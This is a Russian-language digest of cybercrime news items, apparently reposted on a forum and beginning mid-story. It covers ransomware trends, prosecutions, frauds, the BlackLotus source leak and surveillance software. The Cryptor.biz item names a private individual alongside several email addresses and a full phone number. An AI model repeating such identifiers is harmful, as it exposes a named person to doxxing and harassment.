В решении судебной коллегии Испании уточняется, что Токаренко действовал из Испании и имел трех сообщников, которые находились за пределами королевства. Полученные средства мошенники делили между собой, часть денег также использовалась для оплаты работы третьих лиц.
Специалисты [Chainalysis](https://blog.chainalysis.com/reports/crypto-crime- midyear-2023-update-ransomware-scams/) подсчитали, что вымогатели стали единственными киберпреступниками, число которых увеличилось в 2023 году. К тому же этом году хакеры вымогали у своих жертв на 175,8 млн долларов больше, чем год назад. Если такие темпы сохранятся, к концу 2023 года злоумышленники суммарно затребуют у своих жертв около 900 млн долларов.
«Злоумышленники, использующие программы-вымогатели, приближаются ко второму по объемам вымогательства году за всю историю. Только за июнь они потребовали у жертв 449,1 миллиона долларов, — пишут исследователи. — Если такие темпы сохранятся, суммарно в 2023 году злоумышленники затребуют у свих жертв 898,6 млн долларов, уступая лишь 939,9 млн долларов в 2021 году».
Click to expand...
[](https://xakep.ru/wp- content/uploads/2023/07/429338/ransomware.jpg)
Эксперты говорят, что вымогательство стало единственной категорией криптовалютных преступлений, в которой в этом году наблюдается рост. Все остальное, включая взломы, мошенничество, вредоносное ПО, мошеннические магазины и доходы от даркнет-маркетплейсов, демонстрирует резкое снижение.
[](https://xakep.ru/wp- content/uploads/2023/07/429338/trends.jpg)
Судя по всему, движущей силой резкого роста доходов вымогателей является так называемая «охота на крупную дичь», поскольку киберпреступники сосредоточились на атаках на крупные организации, у которых можно требовать большие суммы денег.
Эта тенденция отчетливо видна на графике распределения вымогательских платежей, который демонстрирует заметный рост крупных выкупов.
[](https://xakep.ru/wp- content/uploads/2023/07/429338/distribution1.jpg)
Лидерами в списке получателей крупных платежей стали группировки BlackBasta, LockBit, ALPHV/Blackcat и Clop. При этом средний размер выкупа Clop составляет 1,7 млн долларов, а медианный — 1,9 млн долларов.
В этом году на Clop лежит ответственность сразу за две массовые волны атак с использованием уязвимостей нулевого дня в инструментах для передачи файлов: GoAnywhere от Fortra в первом квартале года, а также [MOVEit Transfer](https://xakep.ru/2023/06/09/moveit- transfer-details/) от Progress во втором.
Также в отчете Chainalysis отмечает рост небольших платежей, которые вымогатели получают после оппортунистических атак типа spray and pray. В основном этот рост связан с RaaS-малварью Dharma, Phobos и STOP/DJVU, чьи операторы обычно вымогают у жертв по несколько сотен долларов. Так, Dharma и Djvu получали средний выкуп в размере 265 и 619 долларов соответственно.
[](https://xakep.ru/wp- content/uploads/2023/07/429338/table.jpg)
Четырем выходцам из Восточной Европы грозит до 20 лет тюремного заключения по обвинениям в рамках Федерального закона о противодействии рэкету и коррупции. Два гражданина России, а также граждане Литвы и Эстонии уже признали себя виновными в администрировании «пуленепробиваемого» хостинга, которые использовался для преступных операций, нацеленных на американские организации.
Хостинг, название которого не разглашается, был основан гражданами России Александром Гричишкиным и Андреем Скворцовым, которые затем наняли литовца Александра Скородумова и эстонца Павла Стасси в качестве системного администратора и руководителя, соответственно. Сами Гричишкин и Скворцов занимались маркетингом, управлением персоналом и поддержкой клиентов, тогда как Скородумов и Стасси поддерживали в рабочем состоянии все системы и помогали клиентам – операторам ботнетов и малвари.
Министерства юстиции США пишет, что хостинг предоставлял киберпреступникам инфраструктуру, которую те использовали для проведения вредоносных кампаний в период с 2008 по 2015 год.
«Группа арендовала IP-адреса, серверы и домены для своих клиентов- киберпреступников, которые затем использовали эту инфраструктуру для размещения вредоносных программ, необходимых для получения доступа к компьютерам жертв, формирования ботнетов и кражи банковских учетных данных с целью последующего мошенничества, — гласит заявление Минюста. — Вредоносное ПО, размещенное данной компанией, включало Zeus, SpyEye, Citadel и Blackhole Exploit Kit, которые в период с 2009 по 2015 год постоянно атаковали американские компании и финансовые учреждения, причиняя или пытаясь причинить убытки, исчисляющиеся миллионами долларов».
Click to expand...
Также хостинг оказывал клиентам другие услуги, включая регистрацию новой инфраструктуры с использованием фиктивных или ворованных личных данных, чтобы хакеры могли обойти блокировки правоохранительных органов и проводить атаки, избегая обнаружения.
«На протяжении многих лет обвиняемые способствовали транснациональной преступной деятельности и работали с обширной сетью киберпреступников по всему миру, предоставляя тем анонимное убежище для их преступной деятельности. Это привело к потерям миллионов долларов среди пострадавших в США», — говорит специальный агент ФБР Тимоти Уотерс.
Click to expand...
Приговоры Стасси, Скородумову, Гричишкину и Скворцову будут вынесены 3 июня, 29 июня, 8 июля и 16 сентября текущего года. Каждому из четырех обвиняемых грозит максимальное наказание в виде 20 лет лишения свободы.
Источник: xakep.ru/2021/05/11/bulletproof-hosting/
В России хотят значительно повысить пороги крупного и особо крупного размеров преступлений о нарушении авторских прав – некоторые из них вырастут в пять раз. Это позволит классифицировать такие нарушения не как уголовные, а как административные, что даст возможность предпринимателям и должностным лицам избежать риска лишения свободы и отделаться только деньгами. Автор изменений – Минюст.
Штраф вместо срока
В России в обозримом будущем может измениться законодательство по части наказания за нарушение авторских прав, в том числе касательно пиратского ПО. Притом поменяется оно в сторону упрощения – власти предлагают значительно снизить нагрузку на тех, кто был признан виновным в этом, притом как административную, так и уголовную.
Информация об этом содержится в новом законопроекте, подготовленном российским Минюстом. Документ размещен на федеральном портале проектов нормативных правовых актов 18 сентября 2023 г. – первым внимание на это обратил «Коммерсант». Если нововведения вступят в силу, примерно 20-30% дел о нарушении авторских прав, вероятно, могут быть декриминилизированы, говорится в пояснительной записке к законопроекту.
Идея Минюста заключается в модификации ст. 146 УК РФ (нарушение авторских и смежных прав). Также ведомство намеренно скорректировать ст. 165 УК РФ (причинение имущественного ущерба путем обмана или злоупотребления доверием). В настоящее время подготовленный законопроект находится на этапе общественного обсуждения, который продлится до 2 октября 2023 г.
«Внесение предлагаемых законопроектом изменений в УК позволит не только декриминализировать порядка 26% преступлений, предусмотренных статьей 146 УК, и 20% преступлений, предусмотренных статьей 165 УК, но и смягчить ответственность по указанным нормам УК (в отношении приблизительно 40% преступлений по части третьей статьи 146 УК и 28% преступлений по части второй статьи 165 УК), – говорится в пояснительной записке к законопроекту.
Что может измениться
Минюст предлагает в первую очередь повысить порог, при котором нарушение ст. 146 УК РФ считается преступлением, совершенным в особо крупном размере, со 100 тыс. руб. до 500 тыс. руб. Такое нарушение карается тюрьмой сроком на два года и штрафом до 200 тыс. руб.
Порог, когда преступление считается совершенным в особо крупном размере, тоже предлагается изменить в большую сторону – с 1 млн руб. до 2 млн руб. Наказание за это – до шести лет тюрьмы и до 500 тыс. руб. штрафа.
Что касается ст. 165 УК РФ, то и здесь российский Минюст предлагает повысить пороги крупного и особо крупного размеров преступлений, притом сразу в четыре раза. В первом случае это будет 1 млн руб. вместо нынешних 250 тыс. руб., во втором – 4 млн руб. вместо 1 млн руб.
Рациональное зерно найдено
Необходимость послаблений в положениях об ответственности за нарушение авторских прав авторы законопроекта объяснили в первую очередь инфляцией, накопленной со времен принятия нынешних законов. Так, пороги по ст. 146 УК РФ были приняты еще в 2011 г., то есть почти 13 лет назад, то есть достаточно давно. Но ст. 165 УК РФ в этом плане не обновлялась почти вдвое дольше – с 2003 г., то есть более 20 лет.
В пояснительной записке к документу также приводится статистика дел о нарушении обеих статей, подавляющее большинство которых закрывается с превышением порогов крупного и особо крупного размеров. Таких вердиктов в России в настоящее время насчитывается около 66%. Если рассматривать в целом по России, то в год таких приговоров выносится в сумме несколько сотен – например, по итогам 2022 г. вердиктов о нарушении ст. 146 УК РФ было 83, а ст. 165 УК РФ – 118 (сведения портала «Судебная статистика РФ»).
«Административка» вместо «уголовки»
Увеличение порога крупного и особо крупного размеров нарушений перечисленных статей позволит переквалифицировать многие дела о нарушении авторских прав из уголовных в административные. Здесь вступает в силу ст. 14.33 КоАП РФ («недобросовестная конкуренция»), нарушение которой карается штрафом от 12 тыс. руб. для должностных лиц и до 500 тыс. руб. для лиц юридических.
В России есть немало случаев, когда предпринимателей лишали свободы за нарушение ст. 146 УК РФ или ст. 165 УК РФ, притом даже тогда, когда у правообладателей не было к ним никаких претензий. В ноябре 2021 г. CNews освещал историю бизнесмена Ивана Красноюрченко, которого суд отправил за решетку на год за пользование пиратской версии ПО «Компас 3D». При рассмотрении дела суд не стал брать во внимание два факта – у владельца прав на «Компас 3D» к Ивану не было вопросов, к тому же у бизнесмена на свободе остались жена и двое детей, один из которых – инвалид.
Спустя месяц появилась информация о еще одном очень похожем случае, когда у правообладателя тоже не было претензий к бизнесмену, которого суд хотел отправить на нары. На этот раз под машину правосудия едва не попала предприниматель Людмила Исламова за использование нелицензионных копий программ «1С». В отличие от дела Ивана Красноюрченко, суд на этот раз учел отсутствие претензий со стороны разработчика ПО, а также наличие у Исламовой несовершеннолетних детей – в противном случае ее жизнь на свободе могла прерваться на долгие шесть лет.
Мнение общества
Инициатива российского Минюста нашла одобрение у экспертов в области права, но представители ИТ-отрасли с ней не согласны. Как сообщила «Коммерсанту» глава экспертного центра по уголовно-правовой политике и исполнению судебных актов «Деловой России» Екатерина Авдеева, законопроект Минюста – «в большей части актуальный и современный». В частности, она нашла доводы об инфляции убедительными, но у нее возникают сомнения в том, что одни пороги Минюст увеличивает в пять раз (речь о крупном размере), а другие – всего вдвое (особо крупный размер).
Директор Ассоциации поставщиков программных продуктов Дмитрий Соколов, напротив, очень опасается нововведений. «В случае поднятия порогов преступлений подавляющее большинство нарушителей будут уходить не только от уголовной, но и от административной ответственности», – заявил он изданию, добавив, что с 2022 г. большая часть возбужденных по ст. 146 УК РФ, касается только российского ПО. «Дел по зарубежному программному обеспечению практически нет – они единичны по правообладателям, продолжающим работать в России», – подытожил Соколов.
Белоруссия подает пример
Пока в России, стране с безграничной любовью граждан к нелицензионному контенту, пытаются смягчить наказание за нарушение авторских прав, в соседнем государстве его полностью отменили. Еще в начале 2022 г. CNews писал, что в Белоруссии больше нельзя попасть в тюрьму или выплатить штраф за пользование пиратским ПО, просмотр пиратских фильмов или прослушивание пиратской музыки. Закон, упраздняющий санкции за эти действия, получил подпись Президента Белоруссии Александра Лукашенко. Его действие распространяется только на контент из так называемых «недружественных стран».
21 предположительный участник мошеннической схемы exit scam может быть приговорен к лишению свободы на срок 40 564 года.
Власти Турции требуют беспрецедентный срок заключения для подозреваемых в мошенничестве с криптовалютной биржей. Как сообщает Bloomberg, 21 предположительный участник мошеннической схемы, известной как exit scam, может быть приговорен к лишению свободы на срок 40 564 года каждый.
Обвиняемым вменяется руководство ныне уже нефункционирующей криптовалютной биржей Thodex. Согласно обвинительному акту, главой мошеннической биржи предположительно является 28-летний Фарук Фатих Озер, чей след простыл год назад.
В апреле прошлого года на сайте Thodex появилось уведомление для пользователей о том, что трейдинговые публикации будут закрыты на несколько дней в связи с процедурой «продажи». Однако биржа так и не открылась снова, и инвесторы не могли получить доступ к своим счетам и снять деньги. Сама же Thodex в соцсетях заявляла, что никто не был обманут и не лишился своих денег.
Тем не менее, многие пользователи обвинили биржу в exit scam – мошеннической практике, когда компания прекращает предоставлять услуги, но продолжает брать за них плату.
Хотя в то время сообщалось, что ущерб составил несколько миллиардов долларов, согласно обвинительном акту, сумма ущерба составила порядка $24 млн.
На арест Озера был выдан международный ордер. В последний раз его видели в том же месяце, когда закрылась биржа. Мужчина летел из Стамбула в Албанию якобы на встречу с инвесторами.
В прошлом году Озер уверял, что вернется в Турцию и будет сотрудничать со следствием, но до сих пор так и не был пойман.
Глава группировки TrickBot Виталий Ковалев (a.k.a. Bentley, Ben) еще в середине прошлого десятилетия пытался снять в России фильм «Ботнет», одним из героев которого должен был стать его собственный дроп. Как уточняет известный западный ИБ-журналист Брайан Кребс (Brian Krebs), речь идет о российской студентке Кристине Свечинской.
Девушка была арестована агентами ФБР еще в 2010 году, став одним из 37 дропов, обвиненных в сотрудничестве с международной киберпреступной группировкой. 21-летняя на тот момент студентка, приехавшая в США в рамках программы Work & Travel, в итоге пошла на сделку со следствием. Именно со сцены с участием Свечинской должен был начинаться фильм Ковалева, однако съемки пришлось свернуть после обысков в кинокомпании, связанных с расследованием по факту использования трояна Dyre, который был предшественником вредоноса TrickBot.
Кребс напомнил, что в последующие годы многие инициаторы того расследования сами оказались на скамье подсудимых. В частности, обвинения в госизмене были предъявлены начальнику 2-го управления ЦИБ ФСБ Сергею Михайлову (приговорен к 22 годам лишения свободы) и главе отдела расследования компьютерных инцидентов «Лаборатории Касперского» Руслану Стоянову (приговорен к 14 годам лишения свободы), а также главе компании Group-IB Илье Сачкову, который выступал консультантом при съемках фильма «Ботнет».
Кребс также полагает, что ряд утечек указывают на то, что деятельность группировок Conti, Trickbot и Ryuk во многом была схожей, как и используемые ими инструменты, что позволяет говорить о том, что эти группировки были как минимум связаны друг с другом. В частности, Кребс приводит слова CIO компании Intel 471 Майкла ДеБолта (Michael DeBolt) о том, что Ковалев «руководил командой программистов, которым было поручено следить за тем, чтобы вредоносные программы Trickbot и Conti оставались незамеченными различными поставщиками антивирусов».
Более того, Кребс, базируясь на показания ДеБолта, не исключает, что Ковалев в какой-то момент времени делил учетную запись на одном из посвященных хакингу форумов с небезызвестным Евгением Богачевым, создателем трояна Zeus, более известным как Славик. Его ФБР разыскивает еще с начала прошлого десятилетия.
Telegram-канал ВЧК-ОГПУ тем временем и вовсе утверждает со ссылкой на собственные источники, что Trickbot и Conti, по мнению американских силовиков, — одна и та же организация. Журналисты напоминают, что начатое в отношении Ковалева дело, совпавшее по времени со съемками фильма «Ботнет», развалилось, не дойдя до суда, а сам Bentley на время следствия был отпущен под подписку о невыезде.
Ранее Ковалев был назван ключевым сотрудником Trickbot. Суд Нью-Джерси обвинил его в нескольких случаях банковского мошенничества в период, предшествовавший его деятельности в группировке. Помимо него американский Минюст назвал имена еще нескольких человек, подозреваемых в связях с группировкой. Все они являются гражданами России.
В Москве учёного в области теории информации развели на 17 млн. рублей.
Мужчину обманывали на протяжении двух месяцев с участием посредницы Юлии и «мужчины с Лубянки».
81-летнему Владимиру Леонтьеву — доктору физико-математических наук, специалисту в области дискретного анализа и теории информации — мошенники впервые позвонили в апреле 2023 года. Неизвестный представился сотрудником Центробанка и сообщил, что деньги со счёта Леонтьева пытаются похитить, поэтому их нужно отправить на резервный счёт. А потом их, конечно, вернут.
С апреля Леонтьев начал ездить по отделениям различных банков и снимать наличные. В этом ему содействовала «помощница» по имени Юлия — девушка сопровождала пенсионера,
принимала от него деньги и вносила в банкомат, после чего они улетали на счета
мошенников.
9 июня 2023 года Леонтьев снял куш — почти 9 миллионов рублей — со своего
счёта в Сбербанке. Их приехала забирать уже не Юля, а некий «мужчина с
Лубянки». Так было «безопаснее». Деньги Леонтьев передал у своего подъезда.
Через месяц Владимир забеспокоился: к тому моменту мошенники обещали уже
вернуть деньги. Но по телефону они уже не отвечали. Поняв, что его обманули,
учёный пошёл в полицию. 8 августа 2023 года в следственном управлении УВД по
СЗАО возбудили уголовное дело по статье о мошенничестве в особо крупном
размере.
Объявлено вознаграждение в $10 млн. за информацию, которая поможет идентифицировать участников группы.
США назначили вознаграждение в 10 миллионов долларов за сведения, которые помогут раскрыть личности русских хакеров Clop, ответственных за ряд кибератак с использованием вымогательского ПО. Clop известна тем, что требует огромные выкупы от своих жертв за восстановление или неразглашение украденных данных. Среди пострадавших от ее действий были такие известные компании, как Shell, Bombardier и British Airways, а также престижные университеты Стэнфорд и Миннесота.
Группировка Clop эксплуатирует уязвимости в программном обеспечении для передачи файлов, таком как MOVEit Transfer, Accellion FTA и Fortra/Linoma GoAnywhere MFT. После проникновения в веб-приложения Clop устанавливает веб- шелл LEMURLOOT, который дает ей доступ к данным из баз данных. Затем Clop шифрует файлы на компьютерах жертв и выкладывает ультиматумы на своем сайте в темной сети.
Представители Министерства юстиции США заявили, что вознаграждение будет выплачено тем, кто предоставит информацию о лидерах или ключевых членах группировки Clop, а также о любых лицах или организациях, которые поддерживают ее в ее деятельности. Кроме того, США создали специальную рабочую группу по борьбе с вымогательским ПО, которая будет координировать усилия различных правоохранительных и разведывательных агентств.
Это не первый случай, когда США предлагают вознаграждение за информацию о хакерах. Ранее США объявляли о наградах за сведения о китайских хакерах APT10 и APT41, а также о российских хакерах из группировок Evil Corp и Sandworm. В некоторых случаях вознаграждение достигало 10 миллионов долларов.
source: twitter.com/RFJ_USA/status/1669740545403437056
cisa.gov/news-events/news/cisa-and-fbi-release-advisory-cl0p-ransomware-gang-
exploiting-moveit-vulnerability
cisa.gov/news-events/cybersecurity-advisories/aa23-158a
Женщина из Нидерландов рассказала , что ее 8-милетнему сыну удалось купить АК-47 в даркнете без ее ведома.
Барбара Гемен объяснила, что её сын в 8 лет начал заниматься хакерством и заказывать вещи в интернете бесплатно. Покупки в даркнете начинались с чего-то небольшого, например, бесплатной пиццы, но постепенно доставки становились все более серьёзными.
По словам родительницы, ее сын использовал кодовые фразы, например, «Питт идет к нам», каждый раз, когда мама входила в комнату. Так сын маскировал свои действия, общаясь с киберпреступниками в онлайн-играх. Гемен утверждает, что её сын помогал отмывать деньги для хакеров.
Только когда на пороге ее дома появился настоящий AK-47 вместе с патронами, Гемен поняла, что происходящее гораздо серьёзней, чем она думала. Гемен считает, что её сын потратил месяц на то, чтобы выяснить, как заказать оружие и доставить его домой. Она добавила, что сын переправил автомат из Польши в Болгарию, чтобы он прошёл таможню без проверки. Гемен передала AK-47 местному отделению полиции, и против ее ребенка не было предпринято никаких юридических действий.
По ее словам, она также начала замечать изменения в характере своего сына. Он начал просыпаться ночью, чтобы сесть за компьютер, и у него был сильный стресс. И тогда мама узнала, что сын работал с группой международных хакеров.
Гемен связалась с правоохранительными органами и со школой сына за советом, но её опасения были проигнорированы. Взяв дело в свои руки, Гемен решила начать просматривать историю просмотров своего сына и изучать кибербезопасность.
Ситуация достигла предела, когда сын рассказал маме, что его приятели-хакеры просили его помочь взломать компании и отправить им украденную информацию. Тогда Гемен помогла ему разорвать связь с преступниками.
«В наши дни это так просто, потому что у многих детей есть ноутбуки и сотовые телефоны, и вы можете взломать компьютер в несколько кликов. Остановить молодых людей от хакерства — довольно большая проблема. Они часто не знают, что законно, а что незаконно», — сказала Гемен, которая сейчас работает волонтером по кибербезопасности в полиции Нидерландов.
Вместе со своим 20-летним сыном, расследующим даркнет, Гемен в настоящее время работает с недавно созданной голландской целевой группой под названием «Отряд по предотвращению киберпреступлений» (Cyber Offender Prevention Squad, COPS). В рамках группы Гемен рассказывает родителям, как легко их дети могут проскользнуть в темные уголки Интернета и научиться хакерству.
source:
nypost.com/2023/07/23/an-8-year-old-had-no-trouble-buying-an-ak-47-online-and-
mailing-it-home
wsj.com/articles/european-police-aim-to-keep-young-hackers-from-slipping-into-
cybercrime-11657791000
В минувший вторник исследователи из Стэнфордского университета и Калифорнийского университета в Беркли опубликовали совместную научную работу, в которой утверждается, что ответы модели GPT-4 меняются с течением времени. Эта работа подпитывает распространённое, но пока недоказанное мнение о том, что производительность популярной ИИ-модели естественного языка за последние несколько месяцев сильно ухудшилась во многих задачах.
В исследовании под названием «Как меняется поведение ChatGPT с течением времени?», опубликованном на arXiv, Линцзяо Чэнь, Матэй Захария и Джеймс Зоу выразили сомнение в постоянно высокой производительности крупных языковых моделей OpenAI, в частности GPT-3.5 и GPT-4.
Используя доступ через API, специалисты тестировали версии этих моделей за март и июнь 2023 года на таких заданиях, как решение математических задач, ответы на деликатные вопросы, генерация кода и визуальное мышление. В частности, способность GPT-4 определять простые числа, по данным исследователей, резко упала с точности 97,6% в марте до всего 2,4% уже в июне. Но вот что странно — модель GPT-3.5 в большинстве задач наоборот показала улучшенную производительность за тот же период.
Сравнение точности ответов GPT-3.5 и GPT-4 в марте и июне
Мотивация провести подобное исследование у учёных появилось вскоре после того, как люди начали массово жаловаться, что производительность GPT-4 якобы стала постепенно снижаться. Одна из популярных теорий о возможных причинах подразумевает искусственное ограничение производительности самой компанией OpenAI для снижения вычислительных затрат, повышенной скорости отклика и экономии ресурса графических процессоров. Ещё одна забавная теория заключается в том, что «тупым» GPT-4 сделали люди, которые просто часто задают ему глупые вопросы.
Между тем, OpenAI последовательно отрицает любые заявления о том, что возможности GPT-4 ухудшились. Только в прошлый четверг вице-президент OpenAI по продуктам Питер Велиндер написал в своём Twitter *: «Нет, мы не делали GPT-4 глупее. Скорее наоборот: мы делаем каждую новую версию умнее предыдущей».
Хотя новое исследование может показаться убедительным доказательством догадок критиков GPT-4, другие эксперты уверены, что не стоит делать поспешных выводов. Профессор информатики Принстонского университета Арвинд Нараянан считает, что результаты проведённого исследования не доказывают однозначно снижение производительности GPT-4. По его мнению, вполне вероятно, что OpenAI просто провела тонкую настройку модели, в результате чего в ряде задач модель стала вести себя лучше, а в некоторых хуже. Но и это неточно.
Так или иначе, повсеместные заявления о снижении производительности GPT-4 заставили OpenAI провести собственное расследование. «Команда знает о сообщаемом регрессе и изучает этот вопрос», — сообщил в эту среду Логан Килпатрик, глава отдела разработки OpenAI.
Возможно, светлые умы на стороне смогли бы помочь разработчикам OpenAI выяснить причину регресса их системы, однако исходный код GPT-4 закрыт для сторонних разработчиков, за что компанию порицают при каждом удобном случае.
OpenAI не раскрывает источники обучающих материалов для GPT-4, исходный код или даже описание архитектуры модели. С закрытым «чёрным ящиком» вроде GPT-4 исследователи остаются «блуждать в темноте», пытаясь определить свойства системы, которая может иметь дополнительные неизвестные компоненты. Кроме того, модель может измениться в любое время без предупреждения.
Исследователь ИИ доктор Саша Лусьони из Hugging Face также считает непрозрачность OpenAI проблематичной: «Любые результаты на закрытых моделях невоспроизводимы и непроверяемы. Следовательно, с научной точки зрения мы сравниваем енотов и белок».
Лусьони также отметила отсутствие стандартизированных критериев в этой области, которые облегчили бы исследователям сравнение разных версий одной и той же языковой модели: «Они должны фактически предоставлять исходные результаты, а не только общие метрики, чтобы мы могли посмотреть, где они хороши и как они ошибаются».
Исследователь искусственного интеллекта Саймон Уиллисон согласился с Лусьони: «Честно говоря, отсутствие заметок о выпуске и прозрачности, возможно, является самой большой проблемой здесь. Как мы должны создавать надёжное программное обеспечение на основе платформы, которая меняется совершенно недокументированными и таинственными способами каждые несколько месяцев?».
Таким образом, хотя вышеописанная исследовательская работа может быть неидеальной и даже содержать какие-то огрехи в способе тестирования моделей от OpenAI, она поднимает важные вопросы о необходимости большей прозрачности и воспроизводимости результатов при выпуске обновлений крупных языковых моделей. Без этого разработчики и исследователи будут продолжать сталкиваться с неопределённостью и трудностями при работе с этими быстро меняющимися «чёрными ящиками» с искусственным интеллектом.
Исходный код UEFI-буткита BlackLotus, который ранее продавался в даркнете за 5000 долларов, был обнаружен аналитиками компании Binarly на GitHub. Исследователи говорят, что утекшие исходники не совсем полные и содержат в основном руткит и буткит для обхода Secure Boot.
Впервые BlackLotus был замечен в
октябре 2022 года. Его продавец утверждал, что буткит имеет встроенный обход
Secure Boot, встроенную защиту от удаления на уровне Ring0/Ядра, а также
запускается в режиме восстановления и в безопасном режиме. Сообщалось, что
малварь оснащена антивиртуализацей, антиотладкой и обфускацией, что усложняет
ее обнаружение и анализ. Также, согласно заявлениям продавца, защитное ПО не
может обнаружить и уничтожить буткит, так как тот запускается под учетной
записью SYSTEM внутри легитимного процесса.
Помимо этого BlackLotus способен отключать защитные механизмы на целевых
машинах, включая Hypervisor-Protected Code Integrity (HVCI) и Windows
Defender, а также обходить User Account Control (UAC).
BlackLotus имеет размер 80 килобайт, написан на ассемблере и C, и умеет определять геозону жертвы, чтобы избегать заражения машин в странах СНГ. В прошлом году вредонос предлагался к продаже за 5000 долларов США, а каждая новая версия оценивалась еще в 200 долларов США.
Позже угрозу удалось изучить аналитикам из компании ESET. Они подтвердили, что буткит легко обходит Secure Boot и для закрепления в системе использует уязвимость Baton Drop ([CVE-2022-21894](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2022-21894)) годичной давности.
Подчеркивалось, что Microsoft устранила эту проблему еще в январе 2022 года, но злоумышленники по-прежнему могут использовать ее, так как затронутые подписанные бинарники не были добавлены в отзывной список. По словам аналитиков, BlackLotus — это первый задокументированный случай злоупотребления этой уязвимостью.
Позже эксперты Microsoft, во время анализа устройств, скомпрометированных с помощью BlackLotus, выявили ряд особенностей, которые позволяют обнаружить заражение и подробно описали возможные индикаторы компрометации.
Также им удалось обнаружить, что BlackLotus использует еще одну уязвимость,
CVE-2023-24932, тоже связанную с обходом защиты Secure Boot. Хотя баг был
исправлен в мае
текущего года, это обновление было отключено по умолчанию, и Microsoft
потребовала от пользователей Windows выполнить весьма сложную установку этого
исправления вручную.
Так как в компании [предупреждали](https://support.microsoft.com/en-
us/topic/kb5025885-how-to-manage-the-windows-boot-manager-revocations-for-
secure-boot-changes-associated-with-cve-2023-24932-41a975df-
beb2-40c1-99a3-b3ff139f832d), что неправильная установка исправления может
привести к тому, что Windows перестанет запускаться и ее нельзя будет
восстановить даже с установочного носителя, многие люди решили не
устанавливать патчи, оставив устройства уязвимыми для атак.
Как теперь рассказывают специалисты Binarly, исходный код BlackLotus оказался
слит на GitHub пользователем под
ником Yukari. Он пишет, что исходный код был изменен и теперь не эксплуатирует
уязвимость Baton Drop. Вместо этого BlackLotus использует UEFI-руткит
bootlicker, который основан на
руткитах CosmicStrand,
MoonBounce и
[ESPECTRE](https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp-
introducing-especter-bootkit/) UEFI APT.
«Утечка исходного кода неполная и в основном содержит руткит и код буткита для обхода Secure Boot», — рассказал журналистам BleepingComputer сооснователь и глава Binarly Алекс Матросов
Click to expand...
Он поясняет, что методы, используемые в бутките, уже не новы, но утечка исходного кода позволит злоумышленникам легко комбинировать буткит с новыми уязвимостями, как известными, так и неизвестными.
«Большинство из этих приемов и техник известны давно и не представляют существенной опасности. Однако тот факт, что их можно комбинировать с новыми эксплоитами, как это делали создатели BlackLotus, стал неожиданностью для индустрии и показал ограниченность существующих средств защиты ОС», — говорит Матросов.
Click to expand...
Поскольку теперь исходный код буткита стал доступен для всех желающих, не исключено, что с его помощью хакеры смогут создать более мощные вредоносы, способные обойти существующие и будущие меры противодействия таким угрозам.
Гражданин России может быть создателем и администратором крупнейшей в мире службы шифрования вредоносного ПО Cryptor[.]biz. К такому выводу пришел известный американский ИБ-журналист Брайан Кребс (Brian Krebs), опубликовавшийрезультаты своего расследования.
«Как бы ни был хорош Cryptor[.]biz, его владелец, похоже, не проделал большой работы по заметанию собственных следов. Регистрационные записи для сайта скрыты службами защиты конфиденциальности, но на домашней странице ресурса говорится, что потенциальные клиенты должны зарегистрироваться, посетив домен crypt[.]guru или отправив мгновенное сообщение в Jabber на адрес masscrypt@exploit.im, — пишет Кребс.
Записи о Crypt[.]guru также скрыты, но DNS-следы указывают, что для обоих ресурсах настроена переадресация входящей почты на obelisk57@gmail.com. По данным киберразведывательной компании Intel 471, эта почта использовалась для регистрации учетной записи на форуме Blacksoftware с ником Kerens. А masscrypt@exploit.im, в свою очередь, с 2011 года и по настоящее время привязан к пользователю Kerens на форуме Exploit. Что любопытно, его первый пост на площадке был посвящен криптографическому сервису VIP Crypt, который был предшественником Cryptor[.]biz и который в обзоре Kerens назван «дерьмовым».
В Intel 471 также обнаружили, что Kerens использовал адрес электронной почты pepyak@gmail.com, на который, среди прочего, были зарегистрированы учетные записи на Verified и Damagelab. Неоднократно сливавшиеся с Verified данные свидетельствуют о том, что аккаунт Kerens был зарегистрирован в марте 2009 года с IP-адреса в Новосибирске. При этом ник Pepyak также мелькал на различных площадках, в частности, на GoFuckBiz[.]com, где в 2010 году автор признался, что в теплые месяцы живет в Сибири, а на зиму предпочитает уезжать в Таиланд.
Сайт DomainTools.com сообщает, что адрес электронной почты pepyak@gmail.com использовался для регистрации 28 доменных имен за прошедшие годы, в том числе ныне несуществующего российского сайта по продаже автомобилей под названием autodoska[.]biz. Этот портал был оформлен в 2008 году на Юрия Чурнова из Севастополя. Но спустя два года его перерегистрировали на Сергея Пуртова из Юрги, города в Кемеровской области.
Многие из 28 доменов, зарегистрированных на pepyak@gmail.com, имеют в регистрационных записях еще один адрес электронной почты: unforgiven57@mail.ru. Согласно DomainTools, адрес он использовался для регистрации примерно дюжины доменов, в том числе трех, которые изначально были зарегистрированы на адрес электронной почты Kerens — pepyak@gmail.com. Одним из доменов, зарегистрированных в 2006 году на адрес unforgiven57@mail.ru, был thelib[.]ru, много лет служивший местом для скачивания пиратских электронных книг. По данным DomainTools, thelib[.]ru изначально был зарегистрирован на Сергея Пуртова.
Большинство из двух десятков доменов, зарегистрированных на pepyak@gmail.com, в какой-то момент делили сервер с небольшим количеством других доменов, включая mobile-soft[.]su, который был зарегистрирован на адрес электронной почты spurtov@gmail.com.
Constella Intelligence указывает со ссылкой на слитую базу данных СДЭК, что адрес spurtov@gmail.com был закреплен за человеком по имени Сергей Юрьевич Пуртов. Ему также принадлежит номер телефона +79235059268, на который зарегистрирован аккаунт в Skype с ником Pepyak. Помимо этого, парольные связки из различных баз привели Кребса к пользователю Kolumb с форума Antichat. Там он интересовался покупкой доступа к скомпрометированным компьютерам внутри России, а также искал надежную криптографическую службу или штатного шифровальщика.
source: krebsonsecurity[.]com/2023/06/why-malware-crypting-services-deserve- more-scrutiny
Свободный перевод [новости из New York Times](https://www.nytimes.com/2023/07/03/technology/russia-ukraine- surveillance-tech.html)
В NYT утверждают, что получили сотни файлов с ПО от человека, имевшего доступ
к разработкам компаний MFI Soft, Vas Experts и Protei .
Архив содержит более 40 страниц с описанием простого программного обеспечения,
подключаемого непосредственно к телекоммуникационной инфраструктуре оператора
связи (видимо речь про съемники сорм / dpi).
Софт позволяет отслеживать действия пользователей в мессенджерах, таких как
Телеграм, WhatsApp и Signal .
Одна из программ, описанная в документах, с которыми ознакомились журналисты
NYT, может определять, когда люди совершают голосовые вызовы или отправляют
файлы в приложениях с шифрованием.
«Программное обеспечение не может перехватывать определенные сообщения, но
может определить, использует ли кто-то несколько телефонов», — говорится в
статье.
Еще одна функция программы — составление карты на основе коммуникации между пользователями, отслеживание общения с другими людьми, а также определение всех телефонов, которые находились в определенных местах в определенный день.
